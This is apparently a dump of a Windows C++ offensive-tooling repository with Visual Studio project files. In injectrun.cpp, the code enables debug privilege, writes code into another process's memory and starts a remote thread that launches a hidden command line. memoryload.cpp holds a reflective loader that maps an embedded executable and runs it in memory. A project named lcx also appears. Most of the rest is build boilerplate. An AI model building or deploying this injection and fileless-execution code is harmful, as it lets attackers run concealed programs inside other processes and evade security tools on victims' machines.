| Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /injectdll/injectlib.cpp: -------------------------------------------------------------------------------- 1 | #include "injectlib.h" 2 | 3 | 4 | HANDLE _CreateRemoteThread(HANDLE hProcess, 5 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 6 | DWORD dwStackSize, 7 | LPTHREAD_START_ROUTINE lpStartAddress, 8 | LPVOID lpParameter, 9 | DWORD dwCreationFlags, 10 | LPDWORD lpThreadId) 11 | { 12 | NTSTATUS Status; 13 | HANDLE hThread; 14 | NTCREATETHREADEXBUFFER ntBuffer; 15 | DWORD dw0, dw1, MyOSMajorVersion, MyOSMinorVersion; 16 | OSVERSIONINFO osvi; 17 | BOOL MyOSWinNT, MyOSWinNT3_2003, MyOSWinVista_7, MyOSWinVista_8; 18 | HMODULE hKernel32, hNTDLL; 19 | CREATEREMOTETHREAD MyCreateRemoteThread; 20 | GETTHREADID MyGetThreadId; 21 | RTLNTSTATUSTODOSERROR MyRtlNtStatusToDosError; 22 | NTCREATETHREADEX MyNtCreateThreadEx; 23 | 24 | // Get Windows version 25 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 26 | 27 | if (!GetVersionEx(&osvi)) 28 | return NULL; 29 | 30 | // Save version data in global variables 31 | MyOSMajorVersion = osvi.dwMajorVersion; 32 | MyOSMinorVersion = osvi.dwMinorVersion; 33 | MyOSWinNT = osvi.dwPlatformId == VER_PLATFORM_WIN32_NT; 34 | MyOSWinNT3_2003 = (MyOSWinNT && MyOSMajorVersion >= 3 && MyOSMajorVersion <= 5) ? TRUE : FALSE; // Win 3.1 to 2003 35 | MyOSWinVista_7 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion <= 1) ? TRUE : FALSE; // Win Vista to 7 36 | MyOSWinVista_8 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion >= 2) ? TRUE : FALSE; // 8 to ? 37 | 38 | /***** Win NT *****/ 39 | if (MyOSWinNT) 40 | { 41 | if (!(hKernel32 = LoadLibrary("Kernel32.dll"))) 42 | return NULL; 43 | if (!(hNTDLL = LoadLibrary("NTDLL.DLL"))) 44 | return NULL; 45 | 46 | // Win NT all versions 47 | if (!(MyCreateRemoteThread = (CREATEREMOTETHREAD)GetProcAddress(hKernel32, "CreateRemoteThread"))) 48 | return NULL; 49 | if (!(MyRtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hNTDLL, "RtlNtStatusToDosError"))) 50 | return NULL; 51 | 52 | // Win 2003 or later 53 | if ((MyOSMajorVersion == 5 && MyOSMinorVersion >= 2) || MyOSMajorVersion == 6) 54 | { 55 | if (!(MyGetThreadId = (GETTHREADID)GetProcAddress(hKernel32, "GetThreadId"))) 56 | return NULL; 57 | } 58 | 59 | // Win Vista or later 60 | if (MyOSMajorVersion >= 6) 61 | { 62 | if (!(MyNtCreateThreadEx = (NTCREATETHREADEX)GetProcAddress(hNTDLL, "NtCreateThreadEx"))) 63 | return NULL; 64 | } 65 | }//WinNT 66 | 67 | // Win NT 3.1 to 2003 68 | if (MyOSWinNT3_2003) 69 | { 70 | return MyCreateRemoteThread(hProcess, 71 | lpThreadAttributes, 72 | dwStackSize, 73 | lpStartAddress, 74 | lpParameter, 75 | dwCreationFlags, 76 | lpThreadId); 77 | } 78 | // Win Vista or later 79 | else if (MyOSWinVista_7) 80 | { 81 | // Setup and initialize the buffer 82 | memset(&ntBuffer, 0, sizeof(NTCREATETHREADEXBUFFER)); 83 | dw0 = 0; 84 | dw1 = 0; 85 | ntBuffer.Size = sizeof(NTCREATETHREADEXBUFFER); 86 | ntBuffer.Unknown1 = 0x10003; 87 | ntBuffer.Unknown2 = 0x8; 88 | ntBuffer.Unknown3 = &dw1; 89 | ntBuffer.Unknown4 = 0; 90 | ntBuffer.Unknown5 = 0x10004; 91 | ntBuffer.Unknown6 = 4; 92 | ntBuffer.Unknown7 = &dw0; 93 | ntBuffer.Unknown8 = 0; 94 | Status = MyNtCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProcess, lpStartAddress, lpParameter, FALSE, NULL, NULL, NULL, NULL); 95 | if (!NT_SUCCESS(Status)) 96 | { 97 | SetLastError(MyRtlNtStatusToDosError(Status)); 98 | return NULL; 99 | } 100 | if (lpThreadId) 101 | *lpThreadId = MyGetThreadId(hThread); 102 | return hThread; 103 | } 104 | // Win8 to win10~? 105 | else 106 | { 107 | return MyCreateRemoteThread(hProcess, 108 | lpThreadAttributes, 109 | dwStackSize, 110 | lpStartAddress, 111 | lpParameter, 112 | dwCreationFlags, 113 | lpThreadId); 114 | } 115 | } -------------------------------------------------------------------------------- /injectdll/injectlib.h: -------------------------------------------------------------------------------- 1 | #ifndef __INJECTLIB_H__ 2 | #define __INJECTLIB_H__ 3 | 4 | #include 5 | #include 6 | 7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 8 | 9 | typedef struct _UNICODE_STRING { 10 | USHORT Length; 11 | USHORT MaximumLength; 12 | PWSTR Buffer; 13 | } UNICODE_STRING, *PUNICODE_STRING; 14 | 15 | typedef struct _OBJECT_ATTRIBUTES { 16 | ULONG Length; 17 | HANDLE RootDirectory; 18 | PUNICODE_STRING ObjectName; 19 | ULONG Attributes; 20 | PSECURITY_DESCRIPTOR SecurityDescriptor; 21 | PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 22 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 23 | 24 | // Buffer argument passed to NtCreateThreadEx function 25 | typedef struct _NTCREATETHREADEXBUFFER 26 | { 27 | ULONG Size; 28 | ULONG Unknown1; 29 | ULONG Unknown2; 30 | PULONG Unknown3; 31 | ULONG Unknown4; 32 | ULONG Unknown5; 33 | ULONG Unknown6; 34 | PULONG Unknown7; 35 | ULONG Unknown8; 36 | } NTCREATETHREADEXBUFFER; 37 | 38 | // System functions loaded dinamically 39 | typedef DWORD (WINAPI *GETTHREADID)(HANDLE); 40 | typedef HANDLE (WINAPI *CREATEREMOTETHREAD)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); 41 | typedef NTSTATUS (NTAPI *NTCREATETHREADEX)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, ULONG, ULONG, ULONG, ULONG, LPVOID); 42 | typedef ULONG (NTAPI *RTLNTSTATUSTODOSERROR)(NTSTATUS); 43 | 44 | HANDLE _CreateRemoteThread(HANDLE hProcess, 45 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 46 | DWORD dwStackSize, 47 | LPTHREAD_START_ROUTINE lpStartAddress, 48 | LPVOID lpParameter, 49 | DWORD dwCreationFlags, 50 | LPDWORD lpThreadId); 51 | 52 | 53 | #endif // __INJECTLIB_H__ 54 | -------------------------------------------------------------------------------- /injectrun/injectlib.cpp: -------------------------------------------------------------------------------- 1 | #include "injectlib.h" 2 | 3 | 4 | HANDLE _CreateRemoteThread(HANDLE hProcess, 5 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 6 | DWORD dwStackSize, 7 | LPTHREAD_START_ROUTINE lpStartAddress, 8 | LPVOID lpParameter, 9 | DWORD dwCreationFlags, 10 | LPDWORD lpThreadId) 11 | { 12 | NTSTATUS Status; 13 | HANDLE hThread; 14 | NTCREATETHREADEXBUFFER ntBuffer; 15 | DWORD dw0, dw1, MyOSMajorVersion, MyOSMinorVersion; 16 | OSVERSIONINFO osvi; 17 | BOOL MyOSWinNT, MyOSWinNT3_2003, MyOSWinVista_7, MyOSWinVista_8; 18 | HMODULE hKernel32, hNTDLL; 19 | CREATEREMOTETHREAD MyCreateRemoteThread; 20 | GETTHREADID MyGetThreadId; 21 | RTLNTSTATUSTODOSERROR MyRtlNtStatusToDosError; 22 | NTCREATETHREADEX MyNtCreateThreadEx; 23 | 24 | // Get Windows version 25 | osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); 26 | 27 | if (!GetVersionEx(&osvi)) 28 | return NULL; 29 | 30 | // Save version data in global variables 31 | MyOSMajorVersion = osvi.dwMajorVersion; 32 | MyOSMinorVersion = osvi.dwMinorVersion; 33 | MyOSWinNT = osvi.dwPlatformId == VER_PLATFORM_WIN32_NT; 34 | MyOSWinNT3_2003 = (MyOSWinNT && MyOSMajorVersion >= 3 && MyOSMajorVersion <= 5) ? TRUE : FALSE; // Win 3.1 to 2003 35 | MyOSWinVista_7 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion <= 1) ? TRUE : FALSE; // Win Vista to 7 36 | MyOSWinVista_8 = (MyOSWinNT && MyOSMajorVersion == 6 && MyOSMinorVersion >= 2) ? TRUE : FALSE; // 8 to ? 37 | 38 | /***** Win NT *****/ 39 | if (MyOSWinNT) 40 | { 41 | if (!(hKernel32 = LoadLibrary("Kernel32.dll"))) 42 | return NULL; 43 | if (!(hNTDLL = LoadLibrary("NTDLL.DLL"))) 44 | return NULL; 45 | 46 | // Win NT all versions 47 | if (!(MyCreateRemoteThread = (CREATEREMOTETHREAD)GetProcAddress(hKernel32, "CreateRemoteThread"))) 48 | return NULL; 49 | if (!(MyRtlNtStatusToDosError = (RTLNTSTATUSTODOSERROR)GetProcAddress(hNTDLL, "RtlNtStatusToDosError"))) 50 | return NULL; 51 | 52 | // Win 2003 or later 53 | if ((MyOSMajorVersion == 5 && MyOSMinorVersion >= 2) || MyOSMajorVersion == 6) 54 | { 55 | if (!(MyGetThreadId = (GETTHREADID)GetProcAddress(hKernel32, "GetThreadId"))) 56 | return NULL; 57 | } 58 | 59 | // Win Vista or later 60 | if (MyOSMajorVersion >= 6) 61 | { 62 | if (!(MyNtCreateThreadEx = (NTCREATETHREADEX)GetProcAddress(hNTDLL, "NtCreateThreadEx"))) 63 | return NULL; 64 | } 65 | }//WinNT 66 | 67 | // Win NT 3.1 to 2003 68 | if (MyOSWinNT3_2003) 69 | { 70 | return MyCreateRemoteThread(hProcess, 71 | lpThreadAttributes, 72 | dwStackSize, 73 | lpStartAddress, 74 | lpParameter, 75 | dwCreationFlags, 76 | lpThreadId); 77 | } 78 | // Win Vista or later 79 | else if (MyOSWinVista_7) 80 | { 81 | // Setup and initialize the buffer 82 | memset(&ntBuffer, 0, sizeof(NTCREATETHREADEXBUFFER)); 83 | dw0 = 0; 84 | dw1 = 0; 85 | ntBuffer.Size = sizeof(NTCREATETHREADEXBUFFER); 86 | ntBuffer.Unknown1 = 0x10003; 87 | ntBuffer.Unknown2 = 0x8; 88 | ntBuffer.Unknown3 = &dw1; 89 | ntBuffer.Unknown4 = 0; 90 | ntBuffer.Unknown5 = 0x10004; 91 | ntBuffer.Unknown6 = 4; 92 | ntBuffer.Unknown7 = &dw0; 93 | ntBuffer.Unknown8 = 0; 94 | Status = MyNtCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProcess, lpStartAddress, lpParameter, FALSE, NULL, NULL, NULL, NULL); 95 | if (!NT_SUCCESS(Status)) 96 | { 97 | SetLastError(MyRtlNtStatusToDosError(Status)); 98 | return NULL; 99 | } 100 | if (lpThreadId) 101 | *lpThreadId = MyGetThreadId(hThread); 102 | return hThread; 103 | } 104 | // Win8 to win10~? 105 | else 106 | { 107 | return MyCreateRemoteThread(hProcess, 108 | lpThreadAttributes, 109 | dwStackSize, 110 | lpStartAddress, 111 | lpParameter, 112 | dwCreationFlags, 113 | lpThreadId); 114 | } 115 | } -------------------------------------------------------------------------------- /injectrun/injectlib.h: -------------------------------------------------------------------------------- 1 | #ifndef __INJECTLIB_H__ 2 | #define __INJECTLIB_H__ 3 | 4 | #include 5 | #include 6 | 7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 8 | 9 | typedef struct _UNICODE_STRING { 10 | USHORT Length; 11 | USHORT MaximumLength; 12 | PWSTR Buffer; 13 | } UNICODE_STRING, *PUNICODE_STRING; 14 | 15 | typedef struct _OBJECT_ATTRIBUTES { 16 | ULONG Length; 17 | HANDLE RootDirectory; 18 | PUNICODE_STRING ObjectName; 19 | ULONG Attributes; 20 | PSECURITY_DESCRIPTOR SecurityDescriptor; 21 | PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 22 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 23 | 24 | // Buffer argument passed to NtCreateThreadEx function 25 | typedef struct _NTCREATETHREADEXBUFFER 26 | { 27 | ULONG Size; 28 | ULONG Unknown1; 29 | ULONG Unknown2; 30 | PULONG Unknown3; 31 | ULONG Unknown4; 32 | ULONG Unknown5; 33 | ULONG Unknown6; 34 | PULONG Unknown7; 35 | ULONG Unknown8; 36 | } NTCREATETHREADEXBUFFER; 37 | 38 | // System functions loaded dinamically 39 | typedef DWORD (WINAPI *GETTHREADID)(HANDLE); 40 | typedef HANDLE (WINAPI *CREATEREMOTETHREAD)(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD); 41 | typedef NTSTATUS (NTAPI *NTCREATETHREADEX)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, ULONG, ULONG, ULONG, ULONG, LPVOID); 42 | typedef ULONG (NTAPI *RTLNTSTATUSTODOSERROR)(NTSTATUS); 43 | 44 | HANDLE _CreateRemoteThread(HANDLE hProcess, 45 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 46 | DWORD dwStackSize, 47 | LPTHREAD_START_ROUTINE lpStartAddress, 48 | LPVOID lpParameter, 49 | DWORD dwCreationFlags, 50 | LPDWORD lpThreadId); 51 | 52 | 53 | #endif // __INJECTLIB_H__ 54 | -------------------------------------------------------------------------------- /injectrun/injectrun.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "injectlib.h" 6 | 7 | typedef BOOL(WINAPI *typeCreateProcessA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION); 8 | typedef DWORD(WINAPI *typeGetLastError)(VOID); 9 | 10 | struct FuncInfo 11 | { 12 | typeCreateProcessA CreateProcessA; 13 | typeGetLastError GetLastError; 14 | char cmdline[1024]; 15 | 16 | STARTUPINFOA si; 17 | PROCESS_INFORMATION pi; 18 | }; 19 | 20 | void* AllocMemory(HANDLE process, void* address, int size) 21 | { 22 | void* addr = VirtualAllocEx(process, 0, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 23 | if (addr == NULL) 24 | return NULL; 25 | if (!WriteProcessMemory(process, addr, address, size, 0)) 26 | return NULL; 27 | return addr; 28 | } 29 | 30 | DWORD WINAPI MyFunc(FuncInfo* info) 31 | { 32 | DWORD dwRet = 0; 33 | 34 | info->si.cb = sizeof(info->si); 35 | info->si.dwFlags = STARTF_USESHOWWINDOW; 36 | info->si.wShowWindow = SW_HIDE; 37 | 38 | if (info->CreateProcessA(NULL, info->cmdline, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &info->si, &info->pi)) 39 | return 1; 40 | else 41 | dwRet = info->GetLastError(); 42 | 43 | return dwRet; 44 | } 45 | 46 | int WINAPI EndFunc() 47 | { 48 | return 0; 49 | } 50 | 51 | void InjectRun(const char* pid, const char* cmdline) 52 | { 53 | bool res = false; 54 | FuncInfo info = { 0 }; 55 | strcpy(info.cmdline, cmdline); 56 | 57 | HMODULE kernel = GetModuleHandleA("kernel32.dll"); 58 | info.CreateProcessA = (typeCreateProcessA)GetProcAddress(kernel, "CreateProcessA"); 59 | info.GetLastError = (typeGetLastError)GetProcAddress(kernel, "GetLastError"); 60 | 61 | HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, atoi(pid)); 62 | if (process) 63 | { 64 | void* ptr_func = AllocMemory(process, &MyFunc, int(EndFunc) - int(MyFunc)); 65 | void* ptr_info = AllocMemory(process, &info, sizeof(info)); 66 | HANDLE thread = _CreateRemoteThread(process, 0, 0, (LPTHREAD_START_ROUTINE)ptr_func, ptr_info, 0, 0); 67 | if (thread == 0) 68 | printf("CreateRemoteThread failed (err = %d)\n", GetLastError()); 69 | else 70 | { 71 | CloseHandle(thread); 72 | printf("injected in process[%s]\n", pid); 73 | res = true; 74 | } 75 | } 76 | else 77 | printf("OpenProcess failed, err = %d", GetLastError()); 78 | } 79 | 80 | BOOL EnableProcessPrivilege(HANDLE hProcess, PCHAR pstrPrivilege, BOOL bEnable) 81 | { 82 | HANDLE hToken = NULL; 83 | TOKEN_PRIVILEGES tp = { 0 }; 84 | if (!OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 85 | return FALSE; 86 | tp.PrivilegeCount = 1; 87 | if (!LookupPrivilegeValue(NULL, pstrPrivilege, &tp.Privileges[0].Luid)) 88 | { 89 | CloseHandle(hToken); 90 | return FALSE; 91 | } 92 | if (bEnable) 93 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 94 | else 95 | tp.Privileges[0].Attributes = 0; 96 | if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) 97 | { 98 | CloseHandle(hToken); 99 | return FALSE; 100 | } 101 | if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) 102 | { 103 | CloseHandle(hToken); 104 | return FALSE; 105 | } 106 | CloseHandle(hToken); 107 | return TRUE; 108 | } 109 | 110 | int main(int argc, char* argv[]) 111 | { 112 | if (argc !=3) 113 | { 114 | printf("Usage:\n\tinjectdll.exe pid cmdline"); 115 | return 0; 116 | } 117 | 118 | EnableProcessPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE); 119 | InjectRun(argv[1], argv[2]); 120 | 121 | return 1; 122 | } 123 | -------------------------------------------------------------------------------- /injectrun/injectrun.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {4E98049A-D21B-477E-A801-EE13B47EFCA6} 23 | Win32Proj 24 | injectrun 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | -------------------------------------------------------------------------------- /injectrun/injectrun.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /lcx/lcx.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {A7D0DCBC-741A-4A51-B9B4-574D9CA45F64} 23 | Win32Proj 24 | lcx 25 | 8.1 26 | 27 | 28 | 29 | Application 30 | true 31 | v140 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v140 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v140 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v140 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | 105 | 106 | Console 107 | true 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | 120 | 121 | Console 122 | true 123 | true 124 | true 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 136 | 137 | 138 | Console 139 | true 140 | true 141 | true 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /lcx/lcx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /memoryload/memoryload.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | //bin2hex.exe testexe.exe testexe.h hexcode 5 | #ifdef _M_X64 6 | #include "testexe64.h" 7 | #else 8 | #include "testexe.h" 9 | #endif 10 | 11 | typedef int(__stdcall * EntryPoint)(int argc, char* argv[]); 12 | 13 | 14 | BOOL WINAPI MemoryLoad(void* buf, int argc, char* argv[]) 15 | { 16 | PCHAR pBuf = (PCHAR)buf; 17 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)pBuf; 18 | PIMAGE_FILE_HEADER pFileHeader = (PIMAGE_FILE_HEADER)(pBuf + pDosHeader->e_lfanew + 4); 19 | PIMAGE_OPTIONAL_HEADER pOptionalHeader = (PIMAGE_OPTIONAL_HEADER)(pFileHeader + 1); 20 | PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((PCHAR)pOptionalHeader + sizeof(IMAGE_OPTIONAL_HEADER)); 21 | 22 | LPBYTE Mapping = (LPBYTE)VirtualAlloc(NULL, pOptionalHeader->SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 23 | if (Mapping == NULL) 24 | return FALSE; 25 | 26 | for (int i = 0; i < pFileHeader->NumberOfSections; i++, pSectionHeader++) 27 | { 28 | LPVOID VirtualAddress = (LPVOID)((LPBYTE)Mapping + pSectionHeader->VirtualAddress); 29 | 30 | int count = pSectionHeader->SizeOfRawData; 31 | void * dst = VirtualAddress; 32 | const void * src = pBuf + pSectionHeader->PointerToRawData; 33 | 34 | while (count--) 35 | { 36 | *(char *)dst = *(char *)src; 37 | dst = (char *)dst + 1; 38 | src = (char *)src + 1; 39 | } 40 | } 41 | 42 | if (pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size) 43 | { 44 | PIMAGE_BASE_RELOCATION Reloc = (PIMAGE_BASE_RELOCATION)((ULONG_PTR)(pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) + (LPBYTE)(Mapping)); 45 | LPBYTE dwImageBase = (LPBYTE)Mapping; 46 | ULONG_PTR iOffsetRlc = (LPBYTE)Mapping - (LPBYTE)pOptionalHeader->ImageBase; 47 | ULONG Size = pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; 48 | 49 | LPBYTE vaddr; 50 | DWORD dwCount, dwMiniOffset, dwRelocateType; 51 | WORD *items = NULL; 52 | 53 | while (Reloc->VirtualAddress != NULL) 54 | { 55 | vaddr = dwImageBase + Reloc->VirtualAddress; 56 | dwCount = (Reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) >> 1; 57 | items = (WORD *)((char *)Reloc + sizeof(IMAGE_BASE_RELOCATION)); 58 | 59 | for (DWORD i = 0; i < dwCount; ++i) 60 | { 61 | dwMiniOffset = items[i] & 0x0fff; 62 | dwRelocateType = items[i] >> 12; 63 | if (dwRelocateType == IMAGE_REL_BASED_HIGHLOW || IMAGE_REL_BASED_DIR64 == dwRelocateType) 64 | { 65 | (*(ULONG_PTR *)(vaddr + dwMiniOffset)) += iOffsetRlc; 66 | } 67 | } 68 | 69 | Reloc = (PIMAGE_BASE_RELOCATION)(items + dwCount); 70 | } 71 | } 72 | 73 | if (pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size) 74 | { 75 | PIMAGE_IMPORT_DESCRIPTOR pImport = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG_PTR)(pOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) + (LPBYTE)(Mapping)); 76 | PIMAGE_THUNK_DATA pOrgThunk, pFirstThunk; 77 | PIMAGE_IMPORT_BY_NAME pImportName; 78 | 79 | while (pImport->OriginalFirstThunk != NULL) 80 | { 81 | char *name = (char*)Mapping + pImport->Name; 82 | 83 | FARPROC fpFun; 84 | HINSTANCE hInstance = LoadLibraryA(name); 85 | if (hInstance == NULL) 86 | return FALSE; 87 | 88 | pOrgThunk = (PIMAGE_THUNK_DATA)((LPBYTE)Mapping + pImport->OriginalFirstThunk); 89 | pFirstThunk = (PIMAGE_THUNK_DATA)((LPBYTE)Mapping + pImport->FirstThunk); 90 | 91 | while (*(DWORD*)pOrgThunk != NULL) 92 | { 93 | if ((pOrgThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG32) || (pOrgThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64)) 94 | fpFun = GetProcAddress(hInstance, (LPCSTR)(pOrgThunk->u1.Ordinal & 0x0000ffff)); 95 | else 96 | { 97 | pImportName = (PIMAGE_IMPORT_BY_NAME)((LPBYTE)Mapping + pOrgThunk->u1.AddressOfData); 98 | fpFun = GetProcAddress(hInstance, (LPCSTR)pImportName->Name); 99 | } 100 | 101 | pFirstThunk->u1.Ordinal = (ULONG_PTR)fpFun; 102 | pFirstThunk++; 103 | pOrgThunk++; 104 | } 105 | pImport++; 106 | } 107 | } 108 | 109 | DWORD lpflOldProtect = 0; 110 | VirtualProtect((void*)Mapping, pOptionalHeader->SizeOfImage, PAGE_EXECUTE_READWRITE, &lpflOldProtect); 111 | LPVOID entry = (LPVOID)((LPBYTE)Mapping + pOptionalHeader->AddressOfEntryPoint); 112 | 113 | EntryPoint pEntryFunc = (EntryPoint)entry; 114 | pEntryFunc(argc, argv); 115 | 116 | return TRUE; 117 | } 118 | 119 | int main(int argc, char* argv[]) 120 | { 121 | MemoryLoad(hexcode, argc, argv); 122 | return 0; 123 | } 124 | -------------------------------------------------------------------------------- /memoryload/memoryload.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {0AB96C0E-B874-4CA3-9D7D-BEE2C85D7711} 23 | Win32Proj 24 | memoryload 25 | 8.1 26 | memoryload 27 | 28 | 29 | 30 | Application 31 | true 32 | v140 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v140 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v140 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v140 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 